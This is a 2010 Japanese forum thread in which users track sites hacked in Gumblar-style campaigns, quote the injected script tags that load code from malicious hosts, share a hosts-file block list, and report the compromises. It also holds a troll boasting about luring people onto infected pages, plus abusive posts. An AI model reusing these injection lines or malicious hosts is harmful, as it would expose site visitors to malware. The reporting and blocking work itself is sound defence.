10/08/20 00:15:44
【陥落サイトのURL悪用厳禁】
calliy●com/
関西大学なぎなた部
s1●shard●jp/kunagi
Gumblarっぽいのが混ざってるような気が・・
--本日の目玉商品--
【このサイトはコンピュータに損害を与える可能性があります。】
企業コンサルティング、ラジオ番組制作、ECサイト運営、WEB制作の株式会社エントランス。
www●en-trance●co●jp/
↓
■セーフ ブラウジング 診断結果
www.google.com/safebrowsing/diagnostic?site=www●en-trance●co●jp/&hl=ja
>疑わしいサイトとして認識されています。>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
131:名無しさん@お腹いっぱい。
10/08/20 00:18:44
>>129
JAVAとJAVAScriptの違いもわからんバカはスルーしろよw
132:名無しさん@お腹いっぱい。
10/08/20 00:39:23
猛暑で頭沸騰してるのが居るなw
contents-edu●mind●meiji●ac●jp
>fucked by U#0h4x0r Blog:www.noahacker.com fuck jps all killer in the war !
※8080系に陥落
133:名無しさん@お腹いっぱい。
10/08/20 18:28:36
今gradの調子おかしくね?
134:名無しさん@お腹いっぱい。
10/08/20 18:29:45
間違えたgredだ
135:名無しさん@お腹いっぱい。
10/08/21 02:25:32
今北産業
>>130の内、残ってる分。
> kunagi
大学にメルポ
> en-trance
AC_RunActiveContent●jsに別のがあったのでWhoisからメルポ
136:夷塚 ◆y0JEaK6O/gDf
10/08/21 15:49:23
>>130
s1●shard●jp/kunagi
→jsunpack.jeek.org/dec/go?report=a812e039d6e8c23954264744097626222a6d00dc
137:コテハン ◆8080adndqg
10/08/21 18:57:10
>>135-136 乙乙
【陥落サイトのURL悪用厳禁】
CODE1(なつかしー)+8080(現行型)+一番下はガンブラコ・・なのか?
www●simpleds●biz/
138:コテハン ◆8080adndqg
10/08/21 19:05:02
>137追記
jsunpack.jeek.org/dec/go?report=bc5e43cdd9bff71b13258346a81d439ac14ae5b8
139:コテハン ◆8080adndqg
10/08/22 22:00:21
【陥落サイトのURL悪用厳禁】
新ガンブラ子なのか?
<8080のコード><!--「32桁の英数字」--><script src=http://~中略~.php ></script>
↓
www●yenisehirliyiz●biz
danraf●by●ru
hiero●expo●ru ←改竄祭開催中(危)
※他にもたくさんある
■検索わーど
".ru/" ".js></script><--" "--><script src=" ".php ></script>"
■日本のサイトも陥落してるっぽい
detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1445102614
あと、コード一行だけってコレかな?
roseplaceseniorassistedliving●com
140:名無しさん@お腹いっぱい。
10/08/23 21:21:23
www●eudora-jp●com
</HTML>
<script type="text/javascript" src="URLリンク(riotassistance)●ru/Template●js"></script>
<!--68a2c5dd53f8db2f85dd899d63a960bb-->
コンテンツはオン・ザ・エッヂ当時のままっぽいが、よくわかんない奴の手に落ちてる?
141:名無しさん@お腹いっぱい。
10/08/24 21:03:57
www●golf●ne●jp/guest/compe/Play_EachDisp●asp?PID=1
142:名無しさん@お腹いっぱい。
10/08/25 00:28:19
いちおう貼っておく
■DLLのロード方法を狙う新たな攻撃手法~マイクロソフトがアドバイザリ公開
URLリンク(www.so-net.ne.jp)
■マイクロソフト セキュリティ アドバイザリ (2269637)
URLリンク(www.microsoft.com)
143:コテハン ◆8080adndqg
10/08/25 18:10:48
【陥落サイトのURL悪用厳禁】
www●baloghlaszlo●hu/
↓
nuttypiano●com/~●js
どっとこむ・・
144:コテハン ◆8080adndqg
10/08/25 20:35:06
【陥落サイトのURL悪用厳禁】
関東学生アメリカンフットボール連盟公式ホームページ
kcfa●jp/ ←再改竄
>Last-Modified: Wed, 25 Aug 2010 03:26:52 GMT
nuttypiano●com/は、まだ検索に引っ掛からん・・
145:名無しさん@お腹いっぱい。
10/08/25 22:33:51
URLリンク(wwwyoutube)●zz●tc/watchvSUUqke6rxWs
Gumblar?
146:名無しさん@お腹いっぱい。
10/08/26 00:38:22
>>145
ここは鑑定スレではありません
147:名無しさん@お腹いっぱい。
10/08/26 00:38:45
>>144
祝!\(^o^)/再改竄
148:名無しさん@お腹いっぱい。
10/08/26 14:45:29
>>144
niftyにつーほー
前回もniftyにつーほーして受領されたんだけどねぇ。。。
149:コテハン ◆8080adndqg
10/08/27 14:32:43
【陥落サイトのURL悪用厳禁】
www16●atpages●jp/akimonomm/businessstory/
www●curry-ousama●co●jp/i/ ※電話用
150:名無しさん@お腹いっぱい。
10/08/27 19:40:36
>>145
仮想PCが重くなった よってGumblar確定
151:コテハン ◆8080adndqg
10/08/27 20:05:47
【陥落サイトのURL悪用厳禁】
「禿.js」装填中のweb屋
・ホームページ開発,受託,請負,Web開発,システム開発【フィールドシステム】
www●fieldsystem●ne●jp/blog/entvw_0000000001●aspx
↓
<meta name="description" CONTENT="フィールドシステムからのお知らせです。<script src=http://www●wangqiao365●com/img/yahoo●js></script>">
www.google.com/safebrowsing/diagnostic?site=www●fieldsystem●ne●jp/&hl=ja
廃業しろよwwww
152:名無しさん@お腹いっぱい。
10/08/27 20:30:14
>>151
同意w
153:名無しさん@お腹いっぱい。
10/08/27 21:23:47
>>151
これはw
154:名無しさん@お腹いっぱい。
10/08/27 23:40:37
今北産(ry
乙乙
>>149
上:@PAGESにつーほー。
下:削除されたみたい。
>>151
So-netにつーほー。
155:名無しさん@お腹いっぱい。
10/08/28 01:49:58
フィールドシステム
\(^o^)/オワタ
156:名無しさん@お腹いっぱい。
10/08/28 18:45:05
顔文字は「ついったー」で暴れとる?
@housoukomachi
@gyudon_sukiya
@meiji_fan
ついったーにつーほーしたら面白い事になるかもしれんw
※日本のザルな法律じゃなくて、アメリカンな法律で裁かれる
157:名無しさん@お腹いっぱい。
10/08/30 09:13:39
hostsファイルにガンブラーの感染源サイトを明記しておけばある程度防げると思うんだがなぁ
0.0.0.0 cc●wzxyq●com
って感じでゴリゴリと
C:\Windows\System32\drivers\etcフォルダ内のhostsファイルね
158:名無しさん@お腹いっぱい。
10/08/30 09:28:27
それとrd.or.tpはrd.or.tlにURLが変わったまま403の模様
159:名無しさん@お腹いっぱい。
10/08/30 09:55:45
0.0.0.0 www●rctank●jp
0.0.0.0 rctank●jp
0.0.0.0 wzxyq●com
0.0.0.0 cc●wzxyq●com
0.0.0.0 googleads●g●doubleclick●net
0.0.0.0 g●doubleclick●net
0.0.0.0 doubleclick●net
0.0.0.0 nuttypiano●com
0.0.0.0 riotassistance●ru
0.0.0.0 roseplaceseniorassistedliving●com
0.0.0.0 jsunpack●jeek●org
0.0.0.0 jeek●org
0.0.0.0 parkperson●ru
0.0.0.0 www●parkperson●ru
0.0.0.0 pantscow●ru
0.0.0.0 www●pantscow●ru
0.0.0.0 60●42●255●33
0.0.0.0 118●21●192●131
0.0.0.0 118●21●197●41
0.0.0.0 218●43●251●37
0.0.0.0 210●190●162●5
0.0.0.0 118●23●168●15
0.0.0.0 122●1●246●94
0.0.0.0 221●184●27●254
0.0.0.0 163●139●130●150
0.0.0.0 163●139●124●135
0.0.0.0 203●152●213●250
0.0.0.0 www14●atpages●jp
0.0.0.0 www●wangqiao365●com
0.0.0.0 wangqiao365●com
こんな感じで書いておけば気休めにはなるかもしれない
160:名無しさん@お腹いっぱい。
10/08/30 10:19:30
過去レスにもあったけどhosts明記してる人は結構いるよ
161:名無しさん@お腹いっぱい。
10/08/30 11:20:43
取扱注意
sumori●jp
162:名無しさん@お腹いっぱい。
10/08/30 11:25:29
<script type="text/javascript" src="URLリンク(youngarea)●ru/Network●js"></script>
これだな
163:名無しさん@お腹いっぱい。
10/08/30 12:57:49
>>161
電凸完了
164:163
10/08/30 14:30:28
あんの~~スモリさん?
index.phpのコードは光速で消えたけど
jsの中に残ってるコードはどうすんのよ?(苦笑)
電話だけではわからないみたいだから
問い合わせフォームから再凸
■IPA(情報処理推進機構)
URLリンク(www.ipa.go.jp)
▼(3)ウェブサイト改ざんの被害発生時の対処
URLリンク(www.ipa.go.jp)
■インシデント報告の届出(JPCERT/CC)
URLリンク(www.jpcert.or.jp)
■so-netセキュリティ通信
URLリンク(www.so-net.ne.jp)
▼「ガンブラー」「サイト改ざん」めぐる基本のQ&A
URLリンク(www.so-net.ne.jp)
▼サイト改ざん猛威:感染パソコンの修復は「OSの再インストール」が近道
URLリンク(www.so-net.ne.jp)
これだけ添付しておけばきっとわかってくれr(ry
165:名無しさん@お腹いっぱい。
10/08/30 14:53:11
>>164
WHOISからめるぽ。
さくらにもつーほーすたお。
166:名無しさん@お腹いっぱい。
10/08/30 18:34:37
spam ; 終わらないサイトの改竄
URLリンク(slashdot.jp)
岡山はんこ広場
www.hanko-okayama●jp
→nuttypiano●com/E-mail.js (いつもの)
こんなページが設置されていたり。
www.hanko-okayama●jp/where34.html
→www.drugsad●com (薬屋さん)
→nakulan.co●in/_vti_script/h-clearance.php (いつもの)
167:名無しさん@お腹いっぱい。
10/08/30 19:24:05
>>166
~34.htmlにGumblarっぽいのが寄生してるなw
168:名無しさん@お腹いっぱい。
10/08/31 11:42:26 BE:2340096285-2BP(0)
ウイルススキャンしたら80個物の感染jsファイルがあってワロス
幸い削除できたから一安心出来ない
169:名無しさん@お腹いっぱい。
10/08/31 11:48:13
ヒント:誤検出
170:名無しさん@お腹いっぱい。
10/08/31 12:00:58 BE:1872076984-2BP(0)
だとええなぁ avastだからなぁ
171:名無しさん@お腹いっぱい。
10/08/31 16:00:26
取扱注意
www●keiolax●com
172:名無しさん@お腹いっぱい。
10/08/31 17:44:48
92.243.84.187.addr.datapoint.ru Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
h http://うちのサイト/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=
↑が存在しないディレクトリに直接やって来ていた
tiny_mce改竄系か
173:名無しさん@お腹いっぱい。
10/08/31 17:46:03
URLリンク(www.roque.net)
やっぱそうだった
174:名無しさん@お腹いっぱい。
10/09/01 05:52:38
直リンすんなカス 死ねや
175:名無しさん@お腹いっぱい。
10/09/01 18:49:15
>>151
無害とは言え、今現在もコードが残ったままとは・・
フィールドシステム完璧にオワタww
176:名無しさん@お腹いっぱい。
10/09/03 11:00:30
取扱注意
file●asobube●com/sansyoku/index●html
マグロと一緒にウィルスも食わされるとは…!
177:夷塚 ◆y0JEaK6O/gDf
10/09/03 14:19:11
>>176
だれうまw
メル凸済み
178:名無しさん@お腹いっぱい。
10/09/03 16:15:54
rockmansbible○hp○infoseek○co○jp
Trojan:JS/Redirector.DC検出
179:名無しさん@お腹いっぱい。
10/09/03 18:57:04
>>176 つまんね お前はサーモンでも食ってろボケ
180:名無しさん@お腹いっぱい。
10/09/03 19:01:14
>>178 </HTML>の下だな 暗号化されてる部分のC=M("~");を復号化すると
/google●com/mininova●org/youdao●com●phpになるな
181:名無しさん@お腹いっぱい。
10/09/03 19:50:21
>>177
URLリンク(sucuri.net)
注:玄人向け
参照
MW:JS:151
MW:JS:152
182:名無しさん@お腹いっぱい。
10/09/03 20:51:39
>>178
"Trojan:JS/Redirector.DC"という事はMSEか やばいね
183:名無しさん@お腹いっぱい。
10/09/03 21:16:30
え?
184:名無しさん@お腹いっぱい。
10/09/04 00:52:16
>>2,3の対策しててもWebシールド機能無しのセキュリティソフトじゃ防げないとでも言いたいのでは
185:名無しさん@お腹いっぱい。
10/09/04 19:10:17
>>180 だから何
186:名無しさん@お腹いっぱい。
10/09/04 22:14:14
お前の小さな脳味噌で考えれば
187:名無しさん@お腹いっぱい。
10/09/05 00:21:35
system doctor 2006をダウンロードしたいのですが、まだ生き残ってますかね?
どなたかplz
188:名無しさん@お腹いっぱい。
10/09/05 00:44:25
>>187
URLリンク(web.archive.org)
自己責任でな 元々サイトが死んでるから実行出来るかはシラネ
189:名無しさん@お腹いっぱい。
10/09/05 16:11:50
>>188 リンク切れでした・・・
偽アンチウイルスソフトでダウンロードできるとこって何かないですか?
190:名無しさん@お腹いっぱい。
10/09/05 16:20:02
URLリンク(web.archive.org)
これでやってみたらどうだ
191:名無しさん@お腹いっぱい。
10/09/05 16:40:14
>>190 できた。ありがとう。
これでアンチウイルスの性能評価できる。
192:名無しさん@お腹いっぱい。
10/09/05 23:27:13
最近のガンブラーって感染すると偽物セキュリティー入れてくるだけ?
それとも情報盗まれる?
193:名無しさん@お腹いっぱい。
10/09/05 23:37:45
>>192
試してみるのオヌヌメ
194:名無しさん@お腹いっぱい。
10/09/06 00:04:39
>>193
試せたらここで聞いてないわw
195:名無しさん@お腹いっぱい。
10/09/06 10:46:28
ホントに最近不毛な返しが多いな……
「PCすてれば」とか「ためせば」とか「javaきればおkおk」とか
相手にガブガブする奴も多いし
196:コテハン ◆8080adndqg
10/09/06 14:08:00
【陥落サイトのURL悪用厳禁】
ueno-syoten●com/
>>195
荒れるのは「仕様」なので我慢して下さい
197:名無しさん@お腹いっぱい。
10/09/06 22:38:03
www5●ocn●ne●jp/~kobadent/
www16●ocn●ne●jp/~moyogi/
www31●ocn●ne●jp/~jbc/
www4●ocn●ne●jp/~minorisk/
www8●ocn●ne●jp/~iyashiro/
www18●ocn●ne●jp/~serec/ <Gumblar.X>
198:名無しさん@お腹いっぱい。
10/09/07 20:45:08
>>192
感染後の流れはここの「第3段階」のところ
今でも変わってないと思う
blog.trendmicro.co.jp/archives/3340
冗談ではなく、何が行なわれるかは実際に感染しないと分からん
PCが乗っ取られるので、攻撃者のやりたい放題状態になる
199:名無しさん@お腹いっぱい。
10/09/07 22:04:08
>>198
なるほど、情報サンクス
200:コテハン ◆8080adndqg
10/09/07 22:50:09
【陥落サイトのURL悪用厳禁】
8080(旧型)
www●kireibast●sakura●ne●jp/~
↓
URLリンク(search.yahoo.co.jp)●kireibast●sakura●ne●jp&aq=-1&oq=&ei=UTF-8&fr=sfp_as&x=wrt
>約2,310件
たぶんGumblar.x
sugimotokairo●net/index●h
その他(下段は改竄祭り絶賛開催中)
www6●atpages●jp/ryumazin
istanbulyelken●com/iyk/templates_c/index1●html
201:名無しさん@お腹いっぱい。
10/09/09 08:10:55
bigkaden2010net.shop-pro●jp/
202:コテハン ◆8080adndqg
10/09/09 17:16:41
【陥落サイトのURL悪用厳禁】
www●mspinjapan●com/
203:コテハン ◆8080adndqg
10/09/09 17:49:14
【陥落サイトのURL悪用厳禁】
www●foresto-ne●com/
204:名無しさん@お腹いっぱい。
10/09/09 18:01:17
Adobe Reader、Acrobatに新たなゼロデイ攻撃
URLリンク(internet.watch.impress.co.jp)
205:('д') ◆yUyb3Tqn92
10/09/09 20:12:33
悪用厳禁とか書いてるやつマジわりー野郎だなニヒヒヒ
('д')いい加減俺様みたいなのが悪用するのわかって貼ってるだろ
206:名無しさん@お腹いっぱい。
10/09/09 20:25:44
お前が悪用してもたかがしれてるわ
207:('д') ◆yUyb3Tqn92
10/09/09 20:50:23
と、俺様の煽りに早速馬鹿が釣れたわい
こういう反応を高みの見物するの好き('д')v イェィ
208:名無しさん@お腹いっぱい。
10/09/09 20:53:12
何やってんだ?
早く悪用してみろよ糞ガキ
209:名無しさん@お腹いっぱい。
10/09/09 21:03:41
高みの見物
意 味:物事の成り行きを、第三者として傍観すること。
210:コテハン ◆8080adndqg
10/09/09 21:38:57
>>205
33323335333433353333333733323335333333393334333633323335333433313333333533323335
33343335333333373332333533333339333433313332333533333338333333343332333533343335
33333339333233353333333933343331333233353333333933343333333233353334333533333335
33323335333433313334333533323335333433323333333333323335333433353333333833323335
33333338333333303332333533333338333333353332333533343335333333343332333533343332
33333339333233353333333933333339
211:名無しさん@お腹いっぱい。
10/09/09 22:21:32
取扱注意w
ruhuraro●blog57●fc2●com/
212:名無しさん@お腹いっぱい。
10/09/09 22:42:21
fc2のブログもターゲットになったか
213:名無しさん@お腹いっぱい。
10/09/09 22:44:05
33333333333333353333333533363331333333323336333233333333333333363333333333333335
33333335333633313333333733333339333333373333333733333333333333353333333633333331
33333335333333333333333533333337333333333333333433333333333333343333333433333337
33333337333333353333333333333335333333373333333233333335333333333333333333333337
33333333333333353333333533333339333333373333333533333335333333363333333333333335
33333333333333363333333633333331333333343333333233333333333333353333333733333331
3333333333333332333333363333333930643061
214:名無しさん@お腹いっぱい。
10/09/09 23:17:01
>>212
馬鹿?
215:名無しさん@お腹いっぱい。
10/09/10 00:51:01
んー8080系はドメインがだいぶ死んじゃってて検体が入手できん
> 16287 個のドメインを感染させています
www.google.com/safebrowsing/diagnostic?site=nuttypiano.com&hl=ja
だいぶ大きいけど、去年の初代Gumblar(GENO)はピーク時6万
googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html
216:名無しさん@お腹いっぱい。
10/09/10 00:59:06
◆yUyb3Tqn92 これからもどんどん初心者釣ってくれ 初心者が2chに増えすぎていい加減ウザイと思ってきた頃だ
217:名無しさん@お腹いっぱい。
10/09/10 13:26:37
自分で自分を応援するのか
胸が熱くなるな…
218:名無しさん@お腹いっぱい。
10/09/10 16:17:26
>>217
マジキチだから仕方がないw
219: ◆xs.m./NkkNFp
10/09/10 20:49:12
古参(笑)ばかりの2chもつまらんだろうに
220:('д') ◆yUyb3Tqn92
10/09/11 00:29:46
おいおい俺様の話題で持ちきりだな
でも俺様にムカついちゃった奴の自演なのだろう
他の書き込みを自演と決め付けている被害妄想をしてるのがなによりの証拠だぜ
自演大好きな奴にありがちな被害妄想乙(>w<)お見通し!
('д')でもそんなに悔しかったら俺様のようにコテつけて堂々と書き込めばいいのにね
221:('д') ◆yUyb3Tqn92
10/09/11 00:32:05
いろいろな有名なサイトまでが被害に遭っているが
中には俺様が踏ませたことによって感染につながった連中もいるのだろうな
(*'д'*)でも俺様ぴんぴんしてるおw
踏ませるだけなら加害者でも被害者でもない
なので第三者同然(>w<)メシウマ爽快学会!
222:('д') ◆yUyb3Tqn92
10/09/11 00:35:35
ホント過疎ってるなこのスレ
先に立ったあのスレで>>1のスレ番ミスを厳しく指摘した上に死ねとまで言った効果は抜群だったか
223:名無しさん@お腹いっぱい。
10/09/11 00:43:22
>>220
お前が勝ちなのは当然だろ
街中歩いてて通り魔に刺されるなんて思ってる奴いないんだから
お前に突然危険URL踏まされる奴らだって同じこと
224:('д') ◆yUyb3Tqn92
10/09/11 01:11:03
全然同じじゃねーだろ
ウィルスURL踏むのは踏む奴の意思で踏んでるわけだからな
('д')俺様はそいつが踏むように心理誘導してるだけ
ネットやってて自分がウィルスかからないと思ってURL開いてる奴がいるとしたらそいつは低脳以外何者でもねーぜ
そういう意味じゃ俺様がやってることは確かに正義と言っても過言ではないかもな。必要悪という名の正義があっても良いと思うんだ(w)
225:名無しさん@お腹いっぱい。
10/09/11 01:16:16
>>224
ちなみにアンチウイルスソフトは何を使ってるの?
やっぱ情弱御用達のavast!かなw
226:('д') ◆yUyb3Tqn92
10/09/11 02:10:39
>>225
おいおい(>w<)
てことはお前アンチウィルスソフトに頼ってるのか?(>w<)プクーススススwwwww
お前みたいにどんなソフトを入れてればいいかどうかって考えてる時点で不合格。
情弱乙(>w<)レベル低っ!
( 'д' )やっぱ俺様って論破の天才だね
227:('д') ◆yUyb3Tqn92
10/09/11 02:13:15
そして人をムカつかせるのが得意だな(@'д'@)←この顔文字余計ムカつくでしょーwえへへーwww
228:名無しさん@お腹いっぱい。
10/09/11 02:15:57
その顔文字好きだからずっと使ってね
229:名無しさん@お腹いっぱい。
10/09/11 02:18:48
スキルないくせに態度だけはでかいな糞ガキ
230:('д') ◆yUyb3Tqn92
10/09/11 02:20:03
( 'д' )
231:('д') ◆yUyb3Tqn92
10/09/11 02:21:23
( 'д' )
お や す み
232:('д') ◆yUyb3Tqn92
10/09/11 02:22:22
( 'д' )
233:名無しさん@お腹いっぱい。
10/09/11 02:27:00
>>229
そうやって頭にきた素振り見せると余計顔文字喜ばせるだけだぞ
それに>>225-226は確かにお前より顔文字の方が正論だから仕方ない
234:名無しさん@お腹いっぱい。
10/09/11 02:28:48
>>231
おれはお前好きだ
このスレ頭固い奴ばかりだから
またきてくれ、おやすみ
235:名無しさん@お腹いっぱい。
10/09/11 02:31:00
バレバレの自演するなよ
低脳だからこれくらいが限界か
236:↑
10/09/11 03:02:28
IDないスレで自演自演言う奴ってwwww
そんなに必死になるならIDあるスレいけよ低脳wwwww
237:名無しさん@お腹いっぱい。
10/09/11 03:03:37
やべ俺まで正論言っちまったwwww
238:名無しさん@お腹いっぱい。
10/09/11 07:50:35
>>232
FF14スレにも出没してたでしょ
FF14ゲーム内のgumblarってもしかしてあなた?
239:名無しさん@お腹いっぱい。
10/09/11 08:01:53
ID無くてもなんかわかっちゃうな…
エスパー養成講座みたいだ
240:名無しさん@お腹いっぱい。
10/09/11 11:06:56
『馬鹿の一つ覚え』
意 味:愚かな者は一つの事だけを覚え、それをどんな場合にも得意になって持ち出す。
同じ事を何度も繰り返して言う人を皮肉った言葉。
顔文字のためにあるような諺(ことわざ)だなw
241:名無しさん@お腹いっぱい。
10/09/11 11:07:18
なぜセキュ板は自分の考えと違う者に排他的な人が多いのか
242:名無しさん@お腹いっぱい。
10/09/11 11:10:38
240 :名無しさん@お腹いっぱい。:2010/09/11(土) 11:06:56
『馬鹿の一つ覚え』
意 味:愚かな者は一つの事だけを覚え、それをどんな場合にも得意になって持ち出す。
同じ事を何度も繰り返して言う人を皮肉った言葉。
顔文字のためにあるような諺(ことわざ)だなw
241 :名無しさん@お腹いっぱい。:2010/09/11(土) 11:07:18
なぜセキュ板は自分の考えと違う者に排他的な人が多いのか
顔文字にコケにされて悔しいのはわかるが
自演下手すぎ^^;せめて一分以上は時間あけようぜ
あw残念ながら俺はお前が戦ってる顔文字じゃないからね!悪いが^^
243:名無しさん@お腹いっぱい。
10/09/11 13:36:14
あれをコケにしてやったと思ってるのか
244: ◆jvtzoP47MMGU
10/09/11 17:03:00
構ってちゃんに構うお前らもどうかと思うけど(;^_^)
なんで無視できないでレス返すんだろ(;^_^)
245:名無しさん@お腹いっぱい。
10/09/11 17:05:46
iswebが終了すると聞いて
自分のサイトの別館があるgeocitiesのファイルマネージャを1年ぶりくらいに開いたら
スクリプトタグが大量に書き込まれていて広告ページが勝手に作られていた
これはもうだめかね
246:名無しさん@お腹いっぱい。
10/09/11 19:16:04
iswebww
おまえわおれか。
10月に追い出されるよー、めんどくさいよー。
247:名無しさん@お腹いっぱい。
10/09/12 12:43:09
本家のWebGetterって今死んでますよね?
248:名無しさん@お腹いっぱい。
10/09/12 18:07:33
"Canadian Pharmacy" domains
URLリンク(www.mywot.com)
.ru 多すぎだろw
249:名無しさん@お腹いっぱい。
10/09/12 18:27:01
誰かリスト作ってくれないかな
250:名無しさん@お腹いっぱい。
10/09/12 18:58:50
言い出しっぺの法則
251:名無しさん@お腹いっぱい。
10/09/12 19:10:26
言いだしっぺは今期も知識もないヘタレの法則
252:名無しさん@お腹いっぱい。
10/09/12 19:41:29
>>249
WOT入れろよ
253:名無しさん@お腹いっぱい。
10/09/13 13:59:18
新ドメインきたー
scarystroke●ru/●●●●.js
254:名無しさん@お腹いっぱい。
10/09/13 23:21:16
>>249
まあ「自分だけが本質を解っている」妄想がここまで強いともう矯正不可能だろうね
255:名無しさん@お腹いっぱい。
10/09/14 00:53:32
ホームページに関する報告とお詫び
URLリンク(www.sumori.jp)
McAfee SiteAdvisor
URLリンク(siteadvisor.jp)
改竄されてたことを正直に書かないのに「正直な家造り」ですか・・
256:名無しさん@お腹いっぱい。
10/09/14 01:15:32
SANSPO.COM
日本に「報復」!中国ハッカー組織が攻撃宣言
URLリンク(www.sanspo.com)
攻撃増えるらしい
257:名無しさん@お腹いっぱい。
10/09/14 23:51:41
「Flash Player」にゼロデイ攻撃--「Adobe Reader」と「Acrobat」にも影響
URLリンク(japan.cnet.com)
またおまえ(Adobe)か!
258:名無しさん@お腹いっぱい。
10/09/14 23:57:12
BADbe…
259:名無しさん@お腹いっぱい。
10/09/15 09:50:30
しかもこれ再来週まで治らないだと?ふざけんじゃねえよ・・・
ニコニコも一時閉鎖するくらいしないとダメじゃねえか?
260:名無しさん@お腹いっぱい。
10/09/15 16:23:55
アドベの社員は全員毒殺銃殺絞首刑に処すべき
261:名無しさん@お腹いっぱい。
10/09/16 00:15:41
>>260
それだと脆弱性放置になってしまうから
社員全員24時間勤務(休憩無し・メシ抜き)で最速対応のほうが…
今後ゼロデイが発覚したら社員全員尻叩き1万発
※重役の尻叩きの様子はようつべで公開
262:名無しさん@お腹いっぱい。
10/09/16 07:31:10
まあニコニコで騒ぎになってないなら大丈夫だろ
263:名無しさん@お腹いっぱい。
10/09/16 07:39:42
この場合、危険なのは動画サイトだけ?
それとも動画サイト以外もこのゼロデイの対象なのかな
264:名無しさん@お腹いっぱい。
10/09/16 07:52:25
なんで動画サイト限定なんだよ
Flash全てだよ
265:名無しさん@お腹いっぱい。
10/09/16 09:06:07
ハッカーが仕組んだ動画やFlashのページに行っただけでアウトっぽいな
こっちで先に読みこんじゃってるからなぁ
266: ◆DNq5bDQQkRSz
10/09/16 09:50:53
>>261 結局社員が過労死する訳か
267:名無しさん@お腹いっぱい。
10/09/16 13:52:17
>>265
俺はFirefox+Stop Autoplayに避難した
268:名無しさん@お腹いっぱい。
10/09/16 14:11:01
まぁYouTube見るだけならHTML5対応ブラウザで
URLリンク(www.youtube.com)
で有効にすりゃFlash使わんで済むな
269:名無しさん@お腹いっぱい。
10/09/16 18:11:20
gnashに変えた。
いつも見てるページは問題ないみたいだからこのまま行こうかな。
270:名無しさん@お腹いっぱい。
10/09/17 12:37:30
俺はエロページの新規探索をしないことにした
271:名無しさん@お腹いっぱい。
10/09/17 13:28:39
>>269
グナッシュ重くね?動画だけでなく普通のFlashもクソ重いんだけど
ただアドベのタダメシ喰らい共には二度と世話に
なりたくない点では迷いなく同意だが
272:名無しさん@お腹いっぱい。
10/09/19 16:20:16
Security Advisory for Flash Player
URLリンク(www.adobe.com)
Adobe Flash Playerは米国時間9月20日にリリース
Google Chrome内蔵Flashは10.1.85.3に本日更新済み
273:名無しさん@お腹いっぱい。
10/09/19 18:35:01
やっとかよ
274:名無しさん@お腹いっぱい。
10/09/20 18:08:25
10月とか言ってなかったっけ
まあいいけど
275:名無しさん@お腹いっぱい。
10/09/20 18:16:25
10月はAdobeReader(Acrobat)
276:名無しさん@お腹いっぱい。
10/09/20 20:09:55
褒める価値もない これくらいやるのは企業として当然の義務
277:名無しさん@お腹いっぱい。
10/09/21 04:03:40
Flash Player 10.1.85.3 キタ!
278:名無しさん@お腹いっぱい。
10/09/21 07:14:16
今更かよ何やってたんだこのクズ企業
279:名無しさん@お腹いっぱい。
10/09/21 09:38:47
クズ起業のソフト使わないといけない奴もクズなんだよな
280:名無しさん@お腹いっぱい。
10/09/21 11:17:30
流れ的に見て
>>205の影響で最近URL貼るの自重してるんだな
新しいの見つけたので貼ろうと思ったが自重しとく
281:名無しさん@お腹いっぱい。
10/09/21 11:29:06
凸してる側の俺としては、報告はありがたいのだが。
282:名無しさん@お腹いっぱい。
10/09/21 13:15:34
悪用されたところで、ちゃんとアップデートしていれば問題ないんだし、
これだけ騒がれて未だにアップデートもしないずさんな奴は
自重しても別のウィルスに感染するだろ。
283:名無しさん@お腹いっぱい。
10/09/21 13:18:10
だな。
というか1匹のアホのせいで情報の提供・共有に臆するようになったら本末転倒じゃね。
284:名無しさん@お腹いっぱい。
10/09/21 16:09:58
>>280
8080が一時撤退していたからな
現在、放置サイトを中心に新ドメインで再起動中
44Gr44GC44GG44G144GP44Gp44Gj44Go44GT44KA
ここみればわかるんじゃね?
285:名無しさん@お腹いっぱい。
10/09/21 20:48:35
>>284
不定期で観測してるけど
また、動きあったん?
てか、今見たら飛び先の飛び先がまた変わってた。。。おrz。。。。
よく見たら別のXの蜜壷化してるとこの飛び先になってた。
つーことは8080じゃなくてXだったんか>>284
286:名無しさん@お腹いっぱい。
10/09/21 20:58:36
>>285訂正
ホスト勘違いすた。
>>285は忘れてちょ。m(_ _)m
287:名無しさん@お腹いっぱい。
10/09/21 22:07:24
>>286
下段のphp
・jsunpack
09d45fc74d80a65f539b612e6a90739abfe61186
288:名無しさん@お腹いっぱい。
10/09/21 23:16:59
>>287
ノ
あらら、中身かわっちゃたのねぇ。。。
自分が投げた時の
fc588961ef3119b8dc764166e8454389983601ff
昨日検体送った分で、>>287の飛び先もあったからどーすべ。
289:名無しさん@お腹いっぱい。
10/09/21 23:48:52
>>287
とりあえず送ったお。
jsunpack使わせていただきました。m(_ _)m
(何度もアクセスさせるとjsunpackも拒否られるようなので。)
290:名無しさん@お腹いっぱい。
10/09/21 23:55:36
久しぶりにきたら、アホが復活してるのね・・・
フラッシュプレイヤー、更新したほうが良い?
291:名無しさん@お腹いっぱい。
10/09/22 00:04:05
んなアホな質問するような人は来なくていいです
292:名無しさん@お腹いっぱい。
10/09/22 01:00:36
>>290
そのまま阿呆に死ね
293:名無しさん@お腹いっぱい。
10/09/22 01:22:29
ここの住人は陥落サイトを発見できるスキルのある人が選民意識を持ってやってる
初心者はうせろ
294:↑
10/09/22 02:36:22
自己紹介は他所でやれ
あるいは死ね
295:名無しさん@お腹いっぱい。
10/09/22 12:07:47
またアンタか…つくづく暇な奴だな
296:↑
10/09/22 13:02:27
またアンタか…つくづく暇な奴だな
297:名無しさん@お腹いっぱい。
10/09/22 16:12:54
取扱注意
www●okestyles●com/mainframe●asp?c=1 (~529あたりまで延々と...)
※改竄を放置したまま下記サイトに逃亡
www●okestyleszakka●com
アクセス注意
en-trance●co●jp
※>>130参照
完璧にオワタwwwwwww
298:名無しさん@お腹いっぱい。
10/09/22 19:38:06
>>297
おちゅ。
JPCERT/CCにもめるぽすた。
299:名無しさん@お腹いっぱい。
10/09/23 23:44:50
en-trance●co●jp
またコードが変わったなw
300:名無しさん@お腹いっぱい。
10/09/24 04:33:31
>>299
今度は伊太利亜語れすか。。。
aHR0cDovL3RyYW5zbGF0ZS5nb29nbGUuY29tL3RyYW5zbGF0ZV90P3RleHQ9YXVtZW50YXJlJTIw
